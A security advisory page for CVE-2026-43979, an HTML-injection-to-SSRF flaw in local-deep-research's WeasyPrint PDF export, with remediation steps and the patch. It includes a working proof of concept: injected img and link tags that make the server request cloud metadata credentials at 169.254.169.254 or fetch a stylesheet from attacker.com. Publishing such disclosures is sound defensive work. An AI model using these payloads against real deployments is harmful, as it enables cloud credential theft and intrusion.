CVE-2026-43979: local-deep-research HTML injection enables SSRF

CISO Take

local-deep-research, an AI-powered research platform with 1,454 downstream dependents and 24 prior CVEs in the package, contains an HTML injection flaw in its PDF export pipeline: user-controlled research queries are embedded unescaped into HTML rendered by WeasyPrint, which then issues outbound HTTP requests to attacker-specified URLs. Any authenticated user, with no elevated privileges, can chain this injection into a reliable SSRF that bypasses the application's own ssrf_validator.py, because WeasyPrint's resource-fetching path was never routed through that validator. On cloud-hosted deployments (AWS, GCP, Azure), the injected request can reach the instance metadata service at 169.254.169.254; where that service answers unauthenticated GET requests (for example, AWS IMDSv1), IAM role credentials are exposed, enabling lateral movement across the cloud environment with whatever privilege level the instance role holds. Upgrade to local-deep-research v1.6.0 immediately: it ships both the html.escape() input fix (PR #3082) and a safe_url_fetcher that enforces SSRF validation on all WeasyPrint outbound requests (PR #3613). If upgrade is blocked, disable PDF export and enforce IMDSv2 on any AWS instance running this service.

Sources: GitHub Advisory, NVD, ATLAS

What is the risk?

The CVSS score of 5.0 (Moderate) understates operational risk for cloud-hosted deployments. Authentication is required but is a low bar on any shared, SaaS, or multi-user research platform. The SSRF bypass is deterministic, with no timing dependency and no brute force, and the PoC in the advisory is fully operational against commit f3540fb3. The critical amplifier is cloud metadata exposure: a successful exploit against an EC2, GCE, or Azure instance whose metadata service answers plain GET requests can return short-lived IAM credentials whose scope depends entirely on instance role configuration, which is frequently over-privileged in AI research environments. With 1,454 dependents and 24 prior CVEs, the package represents elevated aggregate attack surface. Beyond the advisory's PoC, no standalone exploit tool or scanner template exists at time of analysis, but the advisory's lightweight verification payload ('</title><title>INJECTED') confirms the injection in under 30 seconds.

How does the attack unfold?

Initial Access

Authenticated user submits a research query containing an HTML injection payload (e.g., </title><img src='http://169.254.169.254/...'>) via POST /api/start_research; no elevated privileges required.

AML.T0049

Payload Persistence

The malicious query string is stored verbatim in the database, persisting the injection until any PDF export for that research session is triggered.

Defense Evasion

PDF export renders the stored query into HTML without escaping; WeasyPrint resolves injected resource URLs directly, completely bypassing ssrf_validator.py which only validates user-submitted URLs at input time.
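The escaping gap described in this step can be sketched in a few lines. The snippet below is an illustration rather than the project's code: `render_title_unsafe` and `render_title_escaped` are hypothetical names, and the payload is the benign verification string quoted in the advisory.

```python
import html

# Benign verification payload from the advisory (no network request involved).
PAYLOAD = "</title><title>INJECTED"


def render_title_unsafe(title: str) -> str:
    """Interpolate the title verbatim, mirroring the vulnerable f-string pattern."""
    return f"<title>{title}</title>"


def render_title_escaped(title: str) -> str:
    """Escape HTML metacharacters before interpolation."""
    return f"<title>{html.escape(title)}</title>"


unsafe = render_title_unsafe(PAYLOAD)
escaped = render_title_escaped(PAYLOAD)

print(unsafe)   # contains two opening <title> tags: the payload broke out
print(escaped)  # contains one opening <title> tag: the payload is inert text
```

Counting opening `<title>` tags is only a convenient signal for this sketch; the same breakout applies to any tag the payload introduces.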

AML.T0107

Credential Theft

WeasyPrint issues an HTTP GET to the cloud metadata endpoint (169.254.169.254), retrieving IAM role credentials (AccessKeyId, SecretAccessKey, Token) usable for lateral movement across cloud services.
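To make the destination concrete, here is a minimal sketch of how a resource URL could be classified before it is fetched. `is_blocked_destination` is a hypothetical helper, not the project's `ssrf_validator.py`, and it makes one loud simplification: it only inspects literal IP hosts. A real validator would also resolve hostnames and check the resolved addresses.

```python
import ipaddress
from urllib.parse import urlsplit


def is_blocked_destination(url: str) -> bool:
    """Return True when a URL should not be fetched during rendering.

    Sketch only: hostnames are NOT resolved here, so a name that points at
    an internal address would pass. Treat that as a known gap.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return True  # e.g. file:// or ftp://
    host = parts.hostname
    if host is None:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname, out of scope for this sketch
    return addr.is_link_local or addr.is_private or addr.is_loopback


for candidate in (
    "http://169.254.169.254/latest/meta-data/",
    "http://10.0.0.5/admin",
    "file:///etc/passwd",
    "https://93.184.216.34/logo.png",
):
    print(candidate, is_blocked_destination(candidate))
```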

AML.T0106

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
local-deep-research	pip	< 1.6.0	`1.6.0`

Do you use local-deep-research? Versions before 1.6.0 are affected.

How severe is it?

CVSS 3.1

5.0 / 10

EPSS

0.3%

chance of exploitation in 30 days

Higher than 18% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR Low

UI None

S Changed

C Low

I None

A None
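The metrics above correspond to the vector given in the advisory metadata (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N). As a worked check of how they combine into 5.0, the following is a minimal sketch of the base-score equations from the CVSS v3.1 specification. The helper names are illustrative, and temporal and environmental metrics are not handled.

```python
import math

# Metric weights from the CVSS v3.1 specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """Round up to one decimal place, following the v3.1 Roundup definition."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a 'CVSS:3.1/...' vector string."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    changed = metrics["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[metrics["PR"]]
    iss = 1 - (1 - CIA[metrics["C"]]) * (1 - CIA[metrics["I"]]) * (1 - CIA[metrics["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = 8.22 * AV[metrics["AV"]] * AC[metrics["AC"]] * pr * UI[metrics["UI"]]
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08  # scope-changed multiplier
    return roundup(min(total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"))
```

With C:L as the only impact, the impact sub-score is about 1.44 and exploitability about 3.11; the scope-changed multiplier of 1.08 brings the sum to roughly 4.91, which rounds up to 5.0.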

What should I do?

6 steps

1. Upgrade to local-deep-research v1.6.0 or later. This is the only complete fix: both PRs (#3082 html.escape, #3613 safe_url_fetcher) are required for full remediation.
2. If upgrade is blocked, disable PDF export at the application or reverse-proxy layer until patched.
3. On AWS, enforce IMDSv2 (hop limit 1, session token required) on instances running local-deep-research. WeasyPrint's default URL fetcher cannot satisfy the token challenge (a PUT request followed by a token header on each GET), so metadata access is blocked even if the SSRF fires. On GCP and Azure, confirm that the metadata service's required request headers (Metadata-Flavor: Google and Metadata: true, respectively) are enforced.
4. Audit and tighten IAM instance roles assigned to research servers: apply least privilege and review permissions weekly.
5. Search application, WAF, and egress logs for outbound HTTP requests from the web server process to 169.254.169.254, 10.0.0.0/8, 172.16.0.0/12, or 192.168.0.0/16. The request captured in the advisory's PoC carries a WeasyPrint User-Agent.
6. Validate exposure before patching with the benign payload: submit a research query containing '</title><title>INJECTED' and export to PDF. If the document title reads 'INJECTED', the instance lacks the html.escape() fix (PR #3082). A clean title alone does not confirm full remediation, because the url_fetcher fix (PR #3613) shipped separately in v1.6.0.
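The log search in the steps above can be sketched as a small filter. This is a hedged illustration, not a detection rule: `suspicious_destinations` is a hypothetical helper, the sample log lines use an invented format, and the function flags any IPv4 literal on the line, so it assumes the lines record destinations rather than the server's own private address.

```python
import ipaddress
import re

# Destinations named in the log-search step.
WATCHED_NETWORKS = [
    ipaddress.ip_network("169.254.169.254/32"),
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]
IPV4_PATTERN = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def suspicious_destinations(line: str) -> list[str]:
    """Return IPv4 literals in a log line that fall inside a watched network."""
    hits = []
    for candidate in IPV4_PATTERN.findall(line):
        try:
            addr = ipaddress.ip_address(candidate)
        except ValueError:
            continue  # matched the regex but is not a valid address
        if any(addr in net for net in WATCHED_NETWORKS):
            hits.append(candidate)
    return hits


# Invented sample lines, for illustration only.
sample_log = [
    "GET http://169.254.169.254/latest/meta-data/ ua=WeasyPrint",
    "GET https://93.184.216.34/style.css ua=WeasyPrint",
    "GET http://192.168.1.20:8080/internal ua=WeasyPrint",
]
for entry in sample_log:
    found = suspicious_destinations(entry)
    if found:
        print(found, entry)
```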

What does CISA's SSVC say?

Decision Track*

Exploitation poc

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Data Extraction DoS Framework API
AML.T0049 - Exploit Public-Facing Application
AML.T0075 - Cloud Service Discovery
AML.T0106 - Exploitation for Credential Access
AML.T0107 - Exploitation for Defense Evasion

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.9.3 - Protection of AI system

NIST AI RMF

MANAGE 2.2 - Treatments, responses, and prioritization approaches for identified risks are developed and shared

OWASP LLM Top 10

LLM05 - Improper Output Handling

Frequently Asked Questions

What is CVE-2026-43979?

CVE-2026-43979 is an HTML injection flaw in the PDF export pipeline of local-deep-research, an AI-powered research platform. User-controlled research queries are embedded unescaped into HTML rendered by WeasyPrint, so any authenticated user can inject tags whose resource URLs WeasyPrint then fetches. The result is an SSRF that bypasses the application's own ssrf_validator.py. The advisory classifies the issue under CWE-79 and CWE-918 and lists v1.6.0 as the patched release.

Is CVE-2026-43979 actively exploited?

No confirmed active exploitation of CVE-2026-43979 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-43979?

Upgrade to local-deep-research v1.6.0 or later, which contains both required fixes (PR #3082 html.escape, PR #3613 safe_url_fetcher). If upgrade is blocked, disable PDF export at the application or reverse-proxy layer and, on AWS, enforce IMDSv2 on instances running the service. The full six-step list, including IAM role auditing, log searches, and the benign verification payload, appears under "What should I do?".
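A quick way to check whether an environment already has the fixed release is to compare the installed version against 1.6.0. The sketch below assumes the distribution is installed under the name `local-deep-research` (taken from the project name in the advisory, not verified here) and only handles plain dotted numeric versions; a pre-release string such as `1.6.0rc1` raises `ValueError` rather than being guessed at.

```python
from importlib import metadata
from typing import Optional

FIXED_VERSION = (1, 6, 0)  # first release with both fixes, per the advisory


def parse_version(text: str) -> tuple[int, ...]:
    """Parse a plain dotted version such as '1.5.2', padding to three parts."""
    parts = tuple(int(piece) for piece in text.strip().split("."))
    return parts + (0,) * max(0, 3 - len(parts))


def is_patched(version_text: str) -> bool:
    """Return True when the version is at or above the fixed release."""
    return parse_version(version_text) >= FIXED_VERSION


def installed_is_patched(dist_name: str = "local-deep-research") -> Optional[bool]:
    """Check the installed distribution; None means it is not installed."""
    try:
        return is_patched(metadata.version(dist_name))
    except metadata.PackageNotFoundError:
        return None


print(installed_is_patched())
```

A version check complements the steps above but does not replace them: it says nothing about whether PDF export is exposed or how the instance role is scoped.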

What systems are affected by CVE-2026-43979?

This vulnerability affects the following AI/ML architecture patterns: LLM research platforms, self-hosted AI tools, document generation pipelines, cloud-hosted AI applications.

What is the CVSS score for CVE-2026-43979?

CVE-2026-43979 has a CVSS v3.1 base score of 5.0 (MEDIUM). The EPSS exploitation probability is 0.26%.

What is the AI security impact?

Affected AI Architectures

LLM research platforms, self-hosted AI tools, document generation pipelines, cloud-hosted AI applications

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application

AML.T0075 Cloud Service Discovery

AML.T0106 Exploitation for Credential Access

AML.T0107 Exploitation for Defense Evasion

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.9.3

NIST AI RMF: MANAGE 2.2

OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

## Summary

`PDFService._markdown_to_html()` constructs an HTML document by interpolating user-controlled values, specifically `title` (sourced from `research.title` or `research.query`) and `metadata` key-value pairs, directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in `ssrf_validator.py`.

---

## Details

**Vulnerable code:** `src/local_deep_research/web/services/pdf_service.py`, lines 171–176

```python
# pdf_service.py:171-176
if title:
    html_parts.append(f"<title>{title}</title>")  # ← title is not escaped
if metadata:
    for key, value in metadata.items():
        html_parts.append(f'<meta name="{key}" content="{value}">')  # ← key/value are not escaped
```

**Data flow trace:**

```
User input: research.query
        │
        ▼
research_routes.py:1321       pdf_title = research.title or research.query
        │
        ▼
research_routes.py:1325-1326  export_report_to_memory(report_content, format, title=pdf_title)
        │
        ▼
pdf_service.py:107            PDFService.markdown_to_pdf(markdown_content, title=pdf_title)
        │
        ▼
pdf_service.py:137            _markdown_to_html(markdown_content, title, metadata)
        │
        ▼
pdf_service.py:172            f"<title>{title}</title>"  ← injection point, no escaping
        │
        ▼
pdf_service.py:112            HTML(string=html_content)  ← WeasyPrint renders the injected HTML
```

`research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/<research_id>/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint.

**Injection point 1: `<title>` tag breakout**

```
Input:    </title><img src="http://169.254.169.254/latest/meta-data/" />
Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title>
```

When WeasyPrint encounters the injected `<img>` tag, it issues an HTTP GET request to the value of `src` by default.

**Injection point 2: `<meta>` attribute breakout**

```
Input:    " /><link rel="stylesheet" href="http://attacker.com/evil.css
Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css">
```

WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF.

---

## Proof of Concept

**Step 1: Log in and submit a research query containing the injection payload**

```http
POST /api/start_research HTTP/1.1
Host: localhost:5000
Content-Type: application/json
Cookie: session=<valid_session>

{
  "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>",
  "mode": "quick",
  "model_provider": "OLLAMA",
  "model": "llama3"
}
```

The response returns a `research_id`, e.g. `"aaaa-bbbb-cccc-dddd"`.

**Step 2: After the research completes, trigger PDF export**

```http
POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1
Host: localhost:5000
Cookie: session=<valid_session>
X-CSRFToken: <csrf_token>
```

**Step 3: Intermediate HTML constructed server-side**

```html
<!DOCTYPE html><html><head>
<meta charset="utf-8">
<title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title>
</head><body>
...report content...
</body></html>
```

**Step 4: WeasyPrint issues an outbound HTTP request to the injected URL**

Observed in network monitoring (e.g. `tcpdump`) or the target internal service logs:

```
GET /latest/meta-data/iam/security-credentials/ HTTP/1.1
Host: 169.254.169.254
User-Agent: WeasyPrint/...
```

**Lightweight verification (no SSRF environment required):**

Set the query to:

```
</title><title>INJECTED
```

The resulting HTML will contain two `<title>` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection.

---

## Impact

### 1. Chained SSRF (High Severity)

By injecting `<img src>`, `<link href>`, or `<style>@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to:

- **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure, enabling theft of IAM credentials and instance identity documents.
- **Internal network services** (`192.168.x.x`, `10.x.x.x`), enabling reconnaissance and interaction with internal APIs not exposed to the internet.
- **Localhost administrative interfaces**, if SSRF protections are only applied at the user-input validation layer.

This is an effective bypass of the application's existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint's outbound resource requests are never routed through that validator.

### 2. HTML Document Structure Corruption

Injected tags can prematurely close `<head>` and insert arbitrary content into `<body>`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality.

### 3. CSS Injection (Medium Severity)

By injecting `<link>` or `<style>` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing.

### 4. Affected Scope

- All PDF export operations are affected.
- The vulnerability is reachable by any authenticated user; no elevated privileges are required.
- Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability.

---

## Remediation

Apply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`:

```python
import html

if title:
    html_parts.append(f"<title>{html.escape(title)}</title>")
if metadata:
    for key, value in metadata.items():
        html_parts.append(
            f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">'
        )
```

Additionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources:

```python
def safe_url_fetcher(url, timeout=10):
    from ssrf_validator import validate_url
    if not validate_url(url):
        raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}")
    return weasyprint.default_url_fetcher(url, timeout=timeout)

html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher)
```

---

*Report generated against commit `f3540fb3` (local-deep-research, branch `main`).*

---

## Maintainer note (2026-04-24)

Thanks @Firebasky for the detailed report.

The complete remediation spans two PRs, both merged to `main`:

**#3082** (merged 2026-03-29, shipped in **v1.5.0+**) closes the HTML-injection sinks:

- `html.escape()` now wraps the `title` value in `<title>…</title>`
- Same for metadata keys/values in `<meta name="…" content="…">`
- Regression tests added in `tests/web/services/test_pdf_service.py`

**#3613** (merged 2026-04-24, shipped in **v1.6.0**) implements the `url_fetcher` recommendation from the Remediation section:

- New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL
- Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes
- Covers the chained SSRF path through any URL reaching the rendered HTML: markdown body, citations, raw-HTML passthrough via Python-Markdown
- Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues
- 8 regression tests, including an end-to-end render with `<img src="http://169.254.169.254/…">` embedded in the body

**Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**.

**Patched in v1.6.0**: upgrade to v1.6.0 or later to receive both fixes.
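The maintainer note describes a fetcher that delegates only after validation and raises a `ValueError` subclass when a URL is rejected. That shape can be sketched without WeasyPrint by injecting both the validator and the underlying fetcher. Everything named below (`UnsafeResourceURLError`, `make_guarded_fetcher`, the demo functions) is a hypothetical stand-in for illustration, not the project's implementation.

```python
from typing import Any, Callable


class UnsafeResourceURLError(ValueError):
    """Raised when a resource URL is rejected (hypothetical name for this sketch)."""


def make_guarded_fetcher(
    validate: Callable[[str], bool],
    fetch: Callable[..., Any],
) -> Callable[..., Any]:
    """Wrap `fetch` so it only runs for URLs that `validate` accepts."""

    def guarded(url: str, *args: Any, **kwargs: Any) -> Any:
        if not validate(url):
            raise UnsafeResourceURLError(f"Blocked unsafe URL in PDF rendering: {url}")
        return fetch(url, *args, **kwargs)

    return guarded


# Stand-ins for a real validator and a real fetcher.
def demo_validate(url: str) -> bool:
    return not url.startswith("http://169.254.169.254")


def demo_fetch(url: str, timeout: int = 10) -> dict:
    return {"url": url, "timeout": timeout}


guarded_fetch = make_guarded_fetcher(demo_validate, demo_fetch)
allowed = guarded_fetch("https://example.org/logo.png")

try:
    guarded_fetch("http://169.254.169.254/latest/meta-data/")
    blocked = False
except UnsafeResourceURLError:
    blocked = True

print(allowed, blocked)
```

Passing the validator and fetcher in as arguments keeps the guard testable in isolation, which is one plausible reason to structure it this way; the project's own tests may take a different approach.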

Exploitation Scenario

An analyst with standard user access, or an external attacker who has obtained a trial or shared account, submits a POST to /api/start_research with the query field set to: </title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/>. The query is stored verbatim in the database. The attacker waits for the research to complete, then issues a POST to /api/v1/research/{id}/export/pdf. Server-side, local-deep-research constructs the HTML document with the unescaped payload inside the <title> tag; WeasyPrint parses the malformed HTML, resolves the injected <img> src attribute, and issues an outbound HTTP GET to 169.254.169.254. On an instance whose metadata service answers plain GET requests, this path returns the IAM role name, and the role-specific path beneath it returns a JSON blob containing AccessKeyId, SecretAccessKey, and Token. The advisory's PoC demonstrates the outbound request itself, observed through network monitoring or the target service's logs; an attacker working from outside can substitute a callback host they control for 169.254.169.254 to confirm that the request fires. An attacker who recovers the credentials can use them to enumerate S3 buckets, access RDS snapshots, or pivot to other cloud services available to the instance role, potentially including training data, model checkpoints, or vector database contents.

Weaknesses (CWE)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (Primary)
CWE-918 Server-Side Request Forgery (SSRF) (Primary)

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

[Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
[Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: HTML body; element attributes (such as src="XYZ"); URIs; JavaScript sections; Cascading Style Sheets and style property; etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.

Source: MITRE CWE corpus.
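The CWE-79 guidance above notes that different parts of one document need different encodings. A minimal sketch with the Python standard library shows the same untrusted value encoded for three of those contexts. The sample value is invented for illustration, and JavaScript and CSS contexts are deliberately left out because they need more than a one-line encoder.

```python
import html
from urllib.parse import quote

# Invented sample of untrusted input.
value = '"><img src=x> & more'

# HTML body text: escape &, <, > (quotes are harmless here).
body_text = html.escape(value, quote=False)

# Attribute value: quotes must be escaped too, or the attribute can be closed early.
attribute = html.escape(value, quote=True)

# URI component: percent-encode everything outside the unreserved set.
url_part = quote(value, safe="")

print(body_text)
print(attribute)
print(url_part)
```

The attribute case is the one that matters for the `<meta name="…" content="…">` sink in this advisory: without quote escaping, a `"` in the value ends the attribute.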